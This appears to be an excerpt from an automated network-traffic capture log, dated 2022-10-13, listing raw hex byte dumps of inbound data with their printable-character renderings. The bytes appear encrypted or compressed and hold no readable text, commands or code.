                                                                                                                2022-10-13 11:07:30 UTC1007INData Raw: e3 65 62 bf 59 b0 51 02 1f 1d 82 1c 95 a5 64 7f 67 8a 99 76 15 8a 88 04 a3 93 0b 40 d0 46 1c 04 c1 31 cd 6b 34 85 c1 13 ff 4c 75 74 25 ad 23 ad 57 fe 8f d7 6f 5d 08 76 47 c5 6f 6d fa b3 89 e7 f1 9c 3c c0 1f 69 3d a9 01 79 0f 3d d9 d7 77 aa 98 c7 f7 ee 39 ac 0d cd d4 e3 a3 87 bc ec 3d 6a 78 16 42 f2 64 ae 1c 97 e3 bc a4 b5 ae 72 ef b6 58 d5 05 b6 36 a5 a8 07 e2 39 72 36 22 85 d4 7d d2 30 3f e2 04 bc e6 71 41 bd fe ae 43 b6 ae 58 96 45 8c 0a 92 af ea a6 c5 1d 20 3f d7 d8 cb 48 9e 68 93 15 91 03 c5 1c 10 ca ca c7 f4 59 bc 46 c4 b6 4d 0c dd d2 9d 57 d5 42 fe 5a 0f 45 14 ff 7b a9 e4 bc 6a 00 f8 82 38 8e fc 2a 68 c5 72 af 4a 09 51 67 ae 9d f5 6a d5 8a e3 79 c6 bd 44 ef 33 e2 db 50 6e 39 96 56 f3 3d 2b b8 f3 51 9a d2 25 3e 66 b8 76 d1 f0 99 56 80 87 48 8e f9 fb
                                                                                                                Data Ascii: ebYQdgv@F1k4Lut%#Wo]vGom<i=y=w9=jxBdrX69r6"}0?qACXE ?HhYFMWBZE{j8*hrJQgjyD3Pn9V=+Q%>fvVH
                                                                                                                2022-10-13 11:07:30 UTC1023INData Raw: ec a9 b8 d1 e1 bd ec 0e 38 d5 b5 6d a9 3a 9c 14 47 f8 db db 25 66 31 07 40 79 3a 93 dc cb 8b 8c 74 d9 12 82 e7 49 72 d5 a3 6d cd 8f 12 d3 6e 72 20 a1 77 6a 26 ce 7c b5 e9 53 8b 99 16 56 e7 60 c3 65 8d e5 4d 65 c2 c4 3f 0a 82 aa 38 9b af b4 76 7b 53 6d 94 b6 f3 51 bd 6b 5c 4a 43 b5 ff ec 9a 90 b7 c9 3b 91 ce 17 e3 95 b4 ff 38 9b 52 11 d0 3d 54 f8 b8 cc 43 9f ad 75 77 5e 71 e6 35 ca 4d b0 ff 72 39 04 ba 86 9a 0d 8e c6 71 92 19 a3 85 a8 4d a7 8a 68 33 1e 30 c4 09 ca 43 12 e2 b5 33 c0 b7 8d ca 02 27 aa 03 45 c9 ac 75 79 f9 e9 6b 08 9e cb f0 ca 4e e1 60 fe 60 bc e8 d1 4d 7c 82 17 33 83 8a d6 29 dd 8a db ce 6e 23 fe e8 4d da bc fc 5b 51 60 38 8e 95 eb f3 76 f2 59 8d 50 70 7a d4 eb 82 b7 35 a1 af 44 a8 a5 ca b4 b6 6b da 1b 90 7a 91 62 92 91 d6 d7 37 e3 a9 b7 ad
                                                                                                                Data Ascii: 8m:G%f1@y:tIrmnr wj&|SV`eMe?8v{SmQk\JC;8R=TCuw^q5Mr9qMh30C3'EuykN``M|3)n#M[Q`8vYPpz5Dkzb7
                                                                                                                2022-10-13 11:07:30 UTC1039INData Raw: 3d b4 29 b4 b6 97 98 1b 03 3c b8 a5 50 55 d8 1c 85 45 c0 5b d1 3a 22 d8 f9 26 36 e4 91 51 86 99 64 51 2b aa de 08 ce 7e 28 d3 f4 75 e9 74 90 03 73 6f 40 5d b3 0b 16 da 52 01 82 85 19 39 b7 84 a4 25 8d e1 5c 90 a8 8e 0d d0 b8 33 7e 15 97 25 71 dd ff d7 c4 d4 07 78 08 82 6a e1 80 74 9d f3 31 28 13 44 9e 09 d5 ea 80 7b 53 8f 00 61 83 e4 25 98 71 c6 b4 2c 38 ce a3 77 a0 ab c2 af e4 bd f2 56 72 f1 22 68 de 61 ff 65 d4 52 80 6f fe 06 57 57 71 fa 76 fc 9e 16 ac 1f 9d 8a 3d 50 6e 0c 27 ad 6c 8c e0 fc d3 02 34 91 f9 15 9e f4 e9 9a db 96 4c 12 ef d6 d3 9f 29 a6 3a 1f ae d7 1a a1 e2 8c bd de 32 38 ac 92 c3 23 b5 38 6d f5 1b 60 81 88 4d 5d fe 8d 25 4e cd 8b 6a d0 4f 9f 28 64 9a 8d be 76 10 93 37 93 7e c4 09 6f 36 09 9f e9 a7 eb e8 8c 3d 5a d3 29 66 6e ad 49 6c 3e 34
                                                                                                                Data Ascii: =)<PUE[:"&6QdQ+~(utso@]R9%\3~%qxjt1(D{Sa%q,8wVr"haeRoWWqv=Pn'l4L):28#8m`M]%NjO(dv7~o6=Z)fnIl>4
                                                                                                                2022-10-13 11:07:30 UTC1055INData Raw: f0 72 1f 36 0f 21 3d c1 79 26 62 d4 e4 0b 59 18 16 da 7e 6a 3c 7d 39 90 e6 72 24 5f c7 62 43 f5 fc c5 67 f3 c5 ce f6 ea 85 42 da 56 17 4c 9f 09 8e 20 25 89 29 5d e1 9a b9 c4 64 ea f4 58 ee ab 48 b8 3c aa ea 27 55 0f ae a4 c0 e0 59 16 65 bf af 4a a7 6b 9b 56 38 25 b7 72 24 b2 d2 96 3a ea 1d ef 83 58 1d a0 23 a5 67 a0 1f c5 c1 ec 6e 4d 34 00 aa 0b 77 3b b1 71 9b f4 99 5e 81 01 15 51 4e 4e ee 6d 9d 50 da fb d2 88 8a 91 c2 87 32 a3 29 f0 53 a7 7c 33 d8 62 f9 2b 72 c9 c3 c3 fc 97 81 a5 52 44 95 69 98 f6 f0 10 33 91 66 d3 86 e6 03 0f 6c f9 31 34 9b a8 fa 61 d7 69 79 59 14 d9 6c 0e 8c 95 d4 ee 94 8b 1e b9 24 2b ee 3c a8 c5 fb 3b d9 68 2e f4 ef a0 7e e2 45 e7 99 3f e5 e6 4c 73 49 d4 32 fa 30 1f 28 62 b8 a8 59 df 51 50 ff fa e8 88 4c 15 82 f2 d7 bc 40 18 31 aa 2a
                                                                                                                Data Ascii: r6!=y&bY~j<}9r$_bCgBVL %)]dXH<'UYeJkV8%r$:X#gnM4w;q^QNNmP2)S|3b+rRDi3fl14aiyYl$+<;h.~E?LsI20(bYQPL@1*
                                                                                                                2022-10-13 11:07:30 UTC1071INData Raw: d3 2f 96 11 83 71 09 fa bb 4f 87 42 17 3c f0 61 29 e5 d0 ac 06 a6 f2 13 c8 03 2f 41 ef eb bb f9 eb 23 76 25 92 8e 52 98 69 04 09 5b 29 34 5e 12 a9 fd 0f 21 97 16 60 65 72 e8 5b 02 00 8a 6f 67 70 08 1e 64 9c df 81 87 c6 df ef 12 27 72 1f 2e a2 30 9c 82 75 c6 ab 09 33 4e 0d 02 0d 12 c4 f3 6e 3e b9 29 49 38 47 8d a3 85 d5 49 a3 58 61 22 b6 03 67 a7 52 82 af 51 57 aa 2b 24 a7 a7 5b a7 3e 3f 3a e9 0e 23 b7 aa a1 8d 00 80 6e a5 a7 5c 1a 52 7e af c4 9f 1d ea d8 85 e4 34 2e 9e 66 95 2f 6f f9 a4 71 e4 10 b9 98 72 6a 83 e0 ad 61 c3 30 e2 ec cb a4 6b 45 c8 d8 8e 70 5e 80 f6 9b d2 9f ff 12 35 50 0d d1 70 ec 23 9c d6 91 b6 b1 8f 8c 38 cf e8 89 be e2 f1 9c 81 0f f8 e9 15 79 6e bc b5 e9 e5 f8 6b e5 19 b5 0d 0a 08 e9 5a 86 7c 38 ed 75 75 95 01 6a 62 d0 63 c9 56 65 43 fc
                                                                                                                Data Ascii: /qOB<a)/A#v%Ri[)4^!`er[ogpd'r.0u3Nn>)I8GIXa"gRQW+$[>?:#n\R~4.f/oqrja0kEp^5Pp#8ynkZ|8uujbcVeC
                                                                                                                2022-10-13 11:07:30 UTC1087INData Raw: b6 7d 1e 31 ba ed 06 0c f9 c3 cc 50 98 cb 7b 75 26 cd 3e 5b d3 b1 cc e1 4a 9a 40 18 65 20 36 a4 ec 3b c8 7c 3d 6d f3 71 d7 a8 b6 1e 5d 6a 23 a8 9a e2 56 14 8d 06 df d2 2c 1f 36 77 95 be b5 9a de 8a 0f 09 cf 6b b6 14 78 28 67 0d fd 16 61 c8 37 73 6c a8 db 19 3b 03 9a 84 bb 0d 99 63 80 d8 08 4d 33 f0 90 c5 e4 5f 27 bb c8 3c 67 a9 f0 3b 90 1f 3b 81 0e 67 2d 7f 6c fa 39 08 65 70 ce ad b5 c6 80 5b 4d 68 11 59 de e3 51 e3 3c 37 66 59 b0 de 5d 01 75 bc 73 58 29 76 71 7a 62 2b d0 4b 8b f5 2c f5 79 63 e8 9c aa 8d b2 f9 6a 95 6f 95 f4 19 1d d0 9f 0d 63 a4 6f dd 6f 07 84 96 54 40 38 e0 fb 23 d8 ad 2a 3f 7a 42 5a 92 56 0c bf 1f 63 ca d3 e2 72 e5 ed 70 c3 8b 7e ad 69 ca 4f 82 90 bd c1 b1 dc 2c 15 e1 98 25 90 bc f9 5f 4e d6 f1 b0 b2 51 3d c1 f5 a8 90 64 11 6f 4a da fb
                                                                                                                Data Ascii: }1P{u&>[J@e 6;|=mq]j#V,6wkx(ga7sl;cM3_'<g;;g-l9ep[MhYQ<7fY]usX)vqzb+K,ycjocooT@8#*?zBZVcrp~iO,%_NQ=doJ
                                                                                                                2022-10-13 11:07:30 UTC1103INData Raw: 6d bf 76 11 ab 82 ee c5 0a d8 f5 3b eb 03 9b bc 0c a1 a0 d0 72 47 51 2d 5f 19 2a da 0e 8a 8c 93 f1 b8 28 03 e0 42 9b 8c 53 70 6d 3b 76 2b 19 b6 8e 0c 0e a1 73 6f 42 0d 04 af 86 95 a9 bc 5e 22 6d f8 8e 9f fc 64 e3 50 a0 ca cb 77 c0 e6 e9 2d d4 60 14 7f 56 48 e3 85 fa 64 9d bb f9 e6 03 46 e9 12 57 bc 17 95 6c 7b d9 22 5f f4 7e 5c ac 2c eb f5 a2 a4 64 2c 42 20 9f 73 0c c3 83 76 c9 3b ca 9b f4 c7 2d e8 a5 5f 24 5c b0 88 44 5a bc ad e7 93 18 3d f3 94 86 41 3a 5f 91 4e c0 6a 80 2c 5a a7 66 92 ab 95 f2 81 c0 4a cf 00 0e 45 3b 07 ac 2b f9 5f 0c 66 0c ac 04 b6 04 73 da a3 6d e9 2e c3 44 57 97 cb 01 a6 aa 7a 9b bd 22 6c d0 da 81 30 e7 39 87 2a c9 7e 20 54 84 38 17 4e 51 32 5d d6 6b eb 9f a9 25 50 a4 85 5e 5c 88 66 bb 83 31 68 a9 cf 16 64 f7 e2 c3 62 c8 40 eb 5a a1
                                                                                                                Data Ascii: mv;rGQ-_*(BSpm;v+soB^"mdPw-`VHdFWl{"_~\,d,B sv;-_$\DZ=A:_Nj,ZfJE;+_fsm.DWz"l09*~ T8NQ2]k%P^\f1hdb@Z
                                                                                                                2022-10-13 11:07:30 UTC1119INData Raw: 2a f8 5b 36 f2 b4 18 58 96 12 23 11 cb 6c 0e 83 e0 46 e7 99 16 23 67 2b 37 b8 47 8f 89 ac ab 90 89 9c f3 d6 42 d9 7c a2 89 eb 1c ba a9 bc 94 4a 35 a0 74 6e 03 32 eb 96 c9 b3 b5 77 f5 ae 5a e9 d4 fa 6e fd 2e e8 b2 54 cf 43 a3 8e 38 17 be 5f ca e1 66 da cd f0 09 16 1d 56 4f b6 12 db 3f 7b 8d 07 d1 eb f2 95 be 37 ea 59 87 a0 e6 7b 83 4f 5b 65 58 4a 9a ed 9b 9f 66 0c 7c a9 8f 89 a7 0b 92 b9 e3 c7 69 45 43 da 7c 0a cc 34 a4 d4 d7 ba 1b 22 1d d4 84 e1 2a 49 96 cb 09 00 e1 58 fb b7 e2 e4 fd 92 da a5 73 97 02 ef b4 72 6d 04 f7 09 13 cc 7b e8 a8 5e 59 65 c5 f3 df 96 14 66 0d 58 30 1b 81 f7 e3 44 a5 d5 2a 80 bf 1a 68 de fd ee 86 6f 97 6b 1a 16 be a4 e9 2b 79 82 44 bf 62 3a 02 98 01 f4 6f 75 81 06 74 67 04 cd 7a 18 3c 86 a8 7f 57 59 92 53 11 0a 9b 95 b1 69 aa 62 0f
                                                                                                                Data Ascii: *[6X#lF#g+7GB|J5tn2wZn.TC8_fVO?{7Y{O[eXJf|iEC|4"*IXsrm{^YefX0D*hok+yDb:outgz<WYSib
                                                                                                                2022-10-13 11:07:30 UTC1135INData Raw: 22 50 16 16 66 9d 58 83 1e f8 01 c5 df 4a 41 01 ad 8e 2e 44 e0 55 3b c7 cb 87 65 28 c8 7f 9d f2 09 82 c0 af 4a a0 a4 55 bf 46 43 6f b6 59 87 4c 42 4f 72 38 c1 2f 40 cd 0c 12 9d 0a 5c b3 96 24 fa 6f 9e 0a b5 e8 d6 98 87 78 09 7e a0 53 5a 23 8b f0 63 59 ad bf c0 5b e3 5a a0 eb db 4b 31 d1 e3 c4 e0 61 8d 50 79 56 1d 73 2e b7 6f ad c6 21 cf f6 71 6a a3 71 58 86 c1 9a a0 ba ee a4 f7 61 20 78 f7 50 0c 85 8d 34 c9 74 a0 eb c2 5f 03 ed 7f 43 2a 93 b3 50 1c 15 bb 5e c2 c9 a9 aa 4b cf ce 69 b6 9c 9b 4a ec 66 be 6f 58 92 51 08 9f 50 d9 9c d0 79 67 e6 aa 59 7e 96 32 2f 2b 4b c8 02 f6 f7 f8 5c e1 3b b3 fb 2d 82 f0 6c da 52 7e a7 4b 80 37 52 bc d8 08 9b 02 75 d7 79 98 14 9a ca 90 30 90 4b cf 27 88 d9 ad d9 7c 14 23 1e ff bb 09 fd af 4a 8c 9d 6a 83 36 ce 0d 69 dc 9c e2
                                                                                                                Data Ascii: "PfXJA.DU;e(JUFCoYLBOr8/@\$ox~SZ#cY[ZK1aPyVs.o!qjqXa xP4t_C*P^KiJfoXQPygY~2/+K\;-lR~K7Ruy0K'|#Jj6i
                                                                                                                2022-10-13 11:07:30 UTC1151INData Raw: 77 02 cd c6 b7 bf 9a 1c c9 cb 92 25 38 65 b1 59 24 79 f5 91 80 5b 4e 30 f8 86 eb 19 e0 3e 9a 0e 4e 35 87 1a 99 23 36 2f 0f d3 1c 0d 7b 36 88 8d 47 33 c4 58 68 1d a8 c2 4c 08 4d 5e a0 84 0a c6 36 f0 a2 59 2e 47 b2 5b 2b b9 f9 77 ef b5 d3 0f 88 ec 4e 91 9a da 29 0b 05 2e 43 4d 32 55 ec 84 03 32 e7 9e 62 27 e7 83 bd 2b 28 bf b7 75 ee c0 91 e6 60 04 9c e5 35 81 42 0d c7 dc 6a 63 33 07 42 03 5d a1 b3 a1 aa d3 86 87 8e 18 4a d7 3e 2f 44 4f 4a 20 4d 6e 71 78 cb 8f fe 48 d4 b6 e3 cb 0f 7c 5a a4 5f 05 42 64 2a d0 df 9d 18 65 9a fa 17 35 dc d3 6a fd 4e 66 91 59 37 8e d7 23 0c 55 13 6d 24 85 5e 32 c3 41 18 d9 c6 38 54 91 62 19 71 36 d4 ac 97 3e 5e cc 84 37 70 7c f3 24 0a 8b 9d ee eb 02 aa 67 32 c1 f0 35 7c 6e a6 e4 74 2e 32 71 37 ab d6 a0 02 2e 0c af f4 79 f8 35 7e
                                                                                                                Data Ascii: w%8eY$y[N0>N5#6/{6G3XhLM^6Y.G[+wN).CM2U2b'+(u`5Bjc3B]J>/DOJ MnqxH|Z_Bd*e5jNfY7#Um$^2A8Tbq6>^7p|$g25|nt.2q7.y5~
                                                                                                                2022-10-13 11:07:30 UTC1167INData Raw: 6e 64 9d 65 fc 98 5f f3 9e ad 65 91 e3 e6 46 01 67 4b 27 a4 41 6f 42 d7 c9 e7 6b 66 d1 49 3a 51 73 74 36 1b 77 f4 1d 76 b9 ca 3f 1f c3 ae 40 f5 98 1d 60 95 5b d9 7d b8 d6 98 66 f8 79 79 8c 08 37 1b 1e cd ef a1 25 6d ca 0a 8b 77 05 e9 03 01 c6 bb 3e 56 25 4c d1 f0 6d 1f 41 43 98 f9 48 20 d1 91 cd b8 82 ba fe 1a 45 9a 84 2e 1c 07 91 fc fb 67 5b 2a 2d 9d 13 ed 16 da 3f f7 99 f3 e7 2c 79 26 91 17 50 ca 8b e1 f0 41 72 b3 f4 03 b3 00 ba e2 fd 68 5d 24 5b f4 87 c8 e2 e9 19 ad ab fa 9a 67 93 bf 70 80 60 e5 03 f6 f9 dd 77 3d 12 da 7f 43 28 37 5d e3 13 51 23 70 c6 f2 53 8b 79 a7 61 0e c9 3c e7 c2 61 55 7e 21 bb 2c 98 89 2d 46 95 c2 fd 38 2a ff 9d 7f 6c 53 78 36 b1 fc 9e 2c 13 4f d3 59 4d 6a 43 39 75 fa ca e4 c0 8e 1b 02 ce 9e 1b 89 36 10 16 dc fc b8 ca c9 f3 25 c2
                                                                                                                Data Ascii: nde_eFgK'AoBkfI:Qst6wv?@`[}fyy7%mw>V%LmACH E.g[*-?,y&PArh]$[gp`w=C(7]Q#pSya<aU~!,-F8*lSx6,OYMjC9u6%
                                                                                                                2022-10-13 11:07:30 UTC1183INData Raw: 7f fa aa 25 b2 5a 8c 44 1f 6e 14 f1 56 5a 5f c7 5e e1 bb 14 ad f9 49 84 17 eb 0d a2 eb fa f5 67 3d e9 f9 f4 c3 a6 93 00 7c 1b bd 1b 43 60 c0 9a db 0e ac 6e 32 92 ab 0a a6 71 70 ec 32 e4 ef 8a cb 2c de f6 ba 95 33 3d d3 35 66 86 4a e3 aa fa 5e 2c 9d 73 9b 88 42 96 09 bc 2e d9 16 23 78 4a 87 f6 25 d5 50 4b 2a e4 3c 68 1c 60 4d f9 15 8e 05 c3 b8 0a 47 ec 7e bf 2c 42 f4 a6 0d ab 7a cd 9f 38 f1 ac b2 1b a4 10 e1 d1 6a df 3f cf cc 08 26 35 dc 58 b3 c9 99 90 82 79 69 65 d1 92 3d c3 c1 86 65 81 61 6c a6 93 93 a4 71 23 24 99 50 3a 27 17 e0 10 28 3a c3 62 57 60 86 05 88 9f db ff 28 fb f2 eb f0 2b ce 78 6e 03 d9 87 94 11 3e 29 a7 83 0c 97 f5 0d e1 7c c3 b8 bc bd 92 67 7a 8b 06 93 28 5c 26 58 e8 68 76 b1 4c ad cb 3c 49 c4 74 d1 dd bf 05 80 55 a5 9d 7a 6f c8 9d f1 7b
                                                                                                                Data Ascii: %ZDnVZ_^Ig=|C`n2qp2,3=5fJ^,sB.#xJ%PK*<h`MG~,Bz8j?&5Xyie=ealq#$P:'(:bW`(+xn>)|gz(\&XhvL<ItUzo{
                                                                                                                2022-10-13 11:07:30 UTC1199INData Raw: 08 fa 16 a7 68 32 13 ee 86 6a a6 da b5 23 15 78 d3 12 dc f6 4f e7 f7 a3 7f d8 c7 0e a4 bd 31 00 45 51 b4 ef d8 ac 6f d3 3f fc 96 67 a6 4c d3 31 65 27 45 45 1f 0c 58 36 d9 c7 ff 95 58 6d ad ae 9f 27 b7 06 14 ee 7c 90 29 a0 34 ff 41 6f b9 00 62 a4 e4 db 95 d1 8a a3 77 f2 1d 4d ef 81 a5 aa 6f e8 77 12 78 9a aa 6b bb 2d 99 8a 8c 62 ea d2 48 37 d6 82 9b 5b 00 9e 7e 86 bc f5 2a 1d 50 e4 2e 2f f1 a5 45 0c 92 02 cb 11 42 7b 55 88 46 22 fc 53 39 89 c8 49 74 13 38 ea bf 80 2c 61 15 36 b1 39 d3 16 53 53 2a 45 d4 19 7e 74 cc ba 6a c1 a2 d6 65 62 88 0c 6d 25 50 be 41 eb 0f 9d 81 18 8d 5c 23 32 92 27 e0 0a 27 a3 7a 6f f7 3c a6 60 ae 70 ec f3 80 f5 64 ae b3 b1 36 8a 0b b8 f8 ba 5f 1d 80 90 6f 74 9e 77 ad f0 41 59 ac 89 34 2c db 9c f4 c2 f0 41 f0 3c 74 78 78 9b cd c2 b8
                                                                                                                Data Ascii: h2j#xO1EQo?gL1e'EEX6Xm'|)4AobwMowxk-bH7[~*P./EB{UF"S9It8,a69SS*E~tjebm%PA\#2''zo<`pd6_otwAY4,A<txx
                                                                                                                2022-10-13 11:07:30 UTC1215INData Raw: c3 15 16 50 e5 4a 60 a9 c0 8a d9 6a cf 0c 7a 67 49 fe 76 91 af a7 78 4e 09 c0 f1 9f 66 73 60 83 a3 38 d4 8c 92 29 8c 18 dd ee b0 b2 2b 0e a3 93 5a d4 c7 b6 47 a6 19 12 ae 1e 81 26 73 50 d0 3b bd 4b d8 df e8 7e 7e 01 5f 33 38 1f 27 dc d6 5a 0a f5 93 6c 82 e8 ab 60 b4 74 0f 27 7c 4c 02 9d 9a b3 42 8f 2c c7 f4 b4 34 1c 06 7f 10 7d 45 3d af 80 70 08 a9 a9 e3 6f 32 10 72 3e 8a 33 1a 63 7d 1f b9 eb 0b 53 74 c4 db 69 52 8e b7 62 0b b5 19 2e 5e 2e 0c 9a 40 0e af be 97 55 e6 f5 5c 61 e0 78 20 38 85 23 d9 75 a7 33 78 51 4f a5 53 54 d3 36 d5 d3 51 aa 9a b3 37 c8 f3 36 7f 66 43 3b c2 85 23 12 0e 06 04 0e ed a0 b2 85 72 b8 31 57 14 96 b6 e8 a9 84 6e 37 86 97 d5 9c 29 2b 88 cf 2a 98 9f 17 2a a3 64 83 b3 99 f2 ea fe b6 34 99 49 e9 94 0c 1e 24 dc 4d 84 4e 98 a8 fc f1 5c
                                                                                                                Data Ascii: PJ`jzgIvxNfs`8)+ZG&sP;K~~_38'Zl`t'|LB,4}E=po2r>3c}StiRb.^.@U\ax 8#u3xQOST6Q76fC;#r1Wn7)+**d4I$MN\
                                                                                                                2022-10-13 11:07:30 UTC1231INData Raw: a2 73 db 8f f1 4f 1d 65 0b ab 5c 4e 66 e6 74 dd 8d be 7b 50 ac d6 d3 0a d1 d3 f0 59 41 99 16 a6 30 83 ba 7c 54 8a 82 dc 6c e5 75 8d d7 a3 4e 99 cb e0 c3 a4 4a 0f ac 48 12 81 63 38 2e 2e bd a6 00 91 46 f1 ec ca 52 ba 34 2d 0c 8c 66 f1 7a fe b2 c9 25 b2 92 24 6c 4a 15 c9 f0 9d 2d 32 a6 73 65 86 57 d8 a4 d9 fc 52 7d 4e 5a 55 76 35 f5 3e b1 46 ea 2f c8 cd 28 bc 80 7f 0e 04 7e e8 c3 a5 8b 52 06 78 cc 11 94 da 2a cd d0 3c 3f 57 d6 7f 44 80 4d 1b 29 e3 dc ca 9a 75 a7 94 a5 3c a0 73 c6 4e 57 ee 25 c2 d0 2f 99 e6 a8 25 bd 38 8a 18 8c 08 c8 5f 7e e2 be 88 01 6b a4 5f e8 8f 63 73 fd 14 73 ba 3a 4d 39 f0 31 65 c1 83 9d 6b 13 34 9d 31 70 23 67 af fb 77 83 32 99 71 25 dc 9d 00 22 5c d6 2a 2f 0a aa eb 17 e4 be 63 c9 24 8c 75 13 cb cc a8 af f3 5f 95 9e 3b 8b b7 73 be 4b
                                                                                                                Data Ascii: sOe\Nft{PYA0|TluNJHc8..FR4-fz%$lJ-2seWR}NZUv5>F/(~Rx*<?WDM)u<sNW%/%8_~k_css:M91ek41p#gw2q%"\*/c$u_;sK
                                                                                                                2022-10-13 11:07:30 UTC1247INData Raw: 77 d7 0c 99 3f a3 91 99 a1 b0 91 20 12 ee c8 ac 4c 82 72 d0 21 10 e4 b2 69 d1 dd 00 29 8d d7 2a 0c 7a 65 77 47 cb 1d a6 43 f4 5e a3 e9 e3 c8 7d 43 58 5a 66 97 5d c1 01 8e c3 f2 f3 a9 87 08 7a 0f 0f 6d 53 d0 71 31 d1 e1 2e 9c 6e fd ed f9 65 d6 3c 4a 90 71 6b 5c 06 51 6e 4a 59 5a 71 4f 2b 8e fd 45 4c e5 77 b1 dd d2 6c 73 be d1 eb b0 ab f3 87 d7 bb 45 96 1f fe 9a c7 f8 c5 5b 6e 38 4d 90 1d 7a 09 b5 8f 7e b0 40 0c 7b b0 97 e0 93 94 bd 76 4b d5 93 e1 49 cc b2 fb c4 62 28 ed 42 f9 7f e4 e0 01 d4 28 8a 9d 31 78 af cd eb 84 42 af af bc 9d 1b 6f 50 91 05 ce d2 96 84 bc 6f dd 68 54 10 66 54 7b 15 e6 06 85 93 73 ed c3 2a 80 c1 b8 29 d0 3e fd 2b b3 e3 ca 14 bc 83 23 7c 35 9a 1b d7 80 12 03 21 01 51 5d 70 24 81 98 b4 42 3e 33 97 01 26 60 f5 bc cb 92 f7 42 8f 0f 97 dd
                                                                                                                Data Ascii: w? Lr!i)*zewGC^}CXZf]zmSq1.ne<Jqk\QnJYZqO+ELwlsE[n8Mz~@{vKIb(B(1xBoPohTfT{s*)>+#|5!Q]p$B>3&`B
                                                                                                                2022-10-13 11:07:30 UTC1263INData Raw: 7d 9f 89 b6 44 2d c1 ba 92 7d 1a 75 f2 7c 1c 71 1d c6 71 5a 37 6b 15 d4 58 f5 a5 23 18 0d 46 f4 03 a0 55 1e a0 25 2b 9a 67 d3 01 97 ca 5a 09 c2 86 ff 86 8d 31 82 1e 06 59 37 3d 17 62 9b 9a b2 35 62 d7 6e ad 10 13 84 21 4b 99 e0 93 62 37 03 8e bc 76 7c 84 ca d5 4a de 08 5b c1 f0 f9 da 0a d4 a1 e9 02 81 c4 eb 7c 7d f3 37 36 27 48 6e 10 16 4d 99 0d eb e2 76 7c df c8 d0 11 e2 d1 60 e2 2e 40 96 66 41 1b 1c cd c0 be f8 35 b9 75 bd 6d 26 f0 d5 90 0b ed f9 f3 ea 1b ae e5 fa 2a 35 19 12 e2 2c 9a 00 b3 76 5e f9 43 ab 90 93 f6 a1 32 ae c6 72 39 40 73 8d 16 32 9a 4b 24 22 a8 36 3a 2a e2 1a 86 a3 39 39 f3 d6 83 81 c0 29 74 26 35 61 07 57 c8 08 c7 e4 fa f1 30 0d b2 7f 53 46 89 90 9a 70 f8 e6 34 6d 30 b5 cd 1f b5 21 21 85 75 70 32 f2 ca 98 4c 7e 58 be b0 40 40 2a 68 a9
                                                                                                                Data Ascii: }D-}u|qqZ7kX#FU%+gZ1Y7=b5bn!Kb7v|J[|}76'HnMv|`.@fA5um&*5,v^C2r9@s2K$"6:*99)t&5aW0SFp4m0!!up2L~X@@*h
                                                                                                                2022-10-13 11:07:30 UTC1279INData Raw: 67 c4 b5 9d 1d bd fb 74 3e c1 69 90 65 71 b6 82 13 83 5f 8b 0c 89 8a ac 3a ff 49 99 00 7b b5 3a 98 0a f0 46 66 16 8f 9a 7d 10 10 a0 c7 e3 12 61 68 70 11 16 c1 a9 12 81 5a 8f a3 72 f2 0f ad f3 d0 49 54 85 3e d7 07 c2 8f df be 37 7f f9 31 ca b9 5a c1 2c ee dc ee c8 14 f2 51 54 dd 7a 00 6c 0a fb 1e 3c d6 09 15 e6 1b f9 13 bf 60 75 ab a1 47 c6 f7 6c 83 19 c4 c3 54 dc e7 b0 02 1d dc 1a 8e 42 9c 34 a3 f8 e0 4f a2 90 b7 2d 99 f3 fb 1b ea ad ed 22 39 97 f0 21 c3 8b 88 c5 ea 7a 60 97 be 7a fa 44 9f 9b ac 23 9e bf 42 d2 b4 e3 f0 54 6b e1 b5 f5 e1 33 89 a6 ef b2 04 60 48 a3 85 9a f3 72 8c 34 17 15 f9 88 f6 9d 48 32 e1 9c ef 2a 2a e3 5e 30 d2 46 dd 89 0e dc cc ca 6c 1d 28 9e 6f 94 73 42 5c 73 e5 ed e4 8a ed 7b f6 03 7b 25 af 79 0f cf b7 c0 0f b3 d9 3f d7 37 6c 7b bd
                                                                                                                Data Ascii: gt>ieq_:I{:Ff}ahpZrIT>71Z,QTzl<`uGlTB4O-"9!z`zD#BTk3`Hr4H2**^0Fl(osB\s{{%y?7l{
                                                                                                                2022-10-13 11:07:30 UTC1295INData Raw: 2c 71 d5 c0 53 d5 fa 42 cb d3 14 6d e2 15 b0 e7 8e a2 4c 23 13 4e 5d 3a 42 b1 32 b5 d0 0c 76 62 94 f3 97 dc 7f 4c 3a f9 25 57 00 cd d3 f2 b3 b9 4c 77 c1 4c f5 f5 78 3e 48 72 e3 02 3a 42 ce 98 ef 6c 5f 9f ee 4e 04 7c 31 b0 25 0c ee 2d 4b e2 f8 b6 2a 08 fe d3 9c 95 0f 2d 5b 66 98 79 26 78 0d c9 11 1d ec f6 69 49 14 f9 46 64 94 fc 1c 50 0a 0d 57 20 cc a1 d5 91 a9 05 c0 39 07 48 a8 4d a3 23 42 16 c6 83 e0 49 17 01 bc f2 16 c4 cf 54 14 00 58 2d 95 b0 f8 56 22 25 48 57 9d 2f cf 2a 72 8d b3 f5 cd dc da 2e 58 35 08 51 23 78 ba a6 51 03 87 f4 70 c1 3a c9 b0 df f6 bd a0 4b 5b 74 3b c9 bc d7 a4 64 ec 19 05 3e 16 c8 34 92 ad 36 98 19 aa ad c8 34 84 b2 54 26 2a e9 0a 32 8c 6a d7 f1 1b 13 70 06 02 a0 0e f4 fa 9a 3a ee 89 4f 86 19 87 47 54 cc 9c ad f2 bd da 9c 1c c1 69
                                                                                                                Data Ascii: ,qSBmL#N]:B2vbL:%WLwLx>Hr:Bl_N|1%-K*-[fy&xiIFdPW 9HM#BITX-V"%HW/*r.X5Q#xQp:K[t;d>464T&*2jp:OGTi
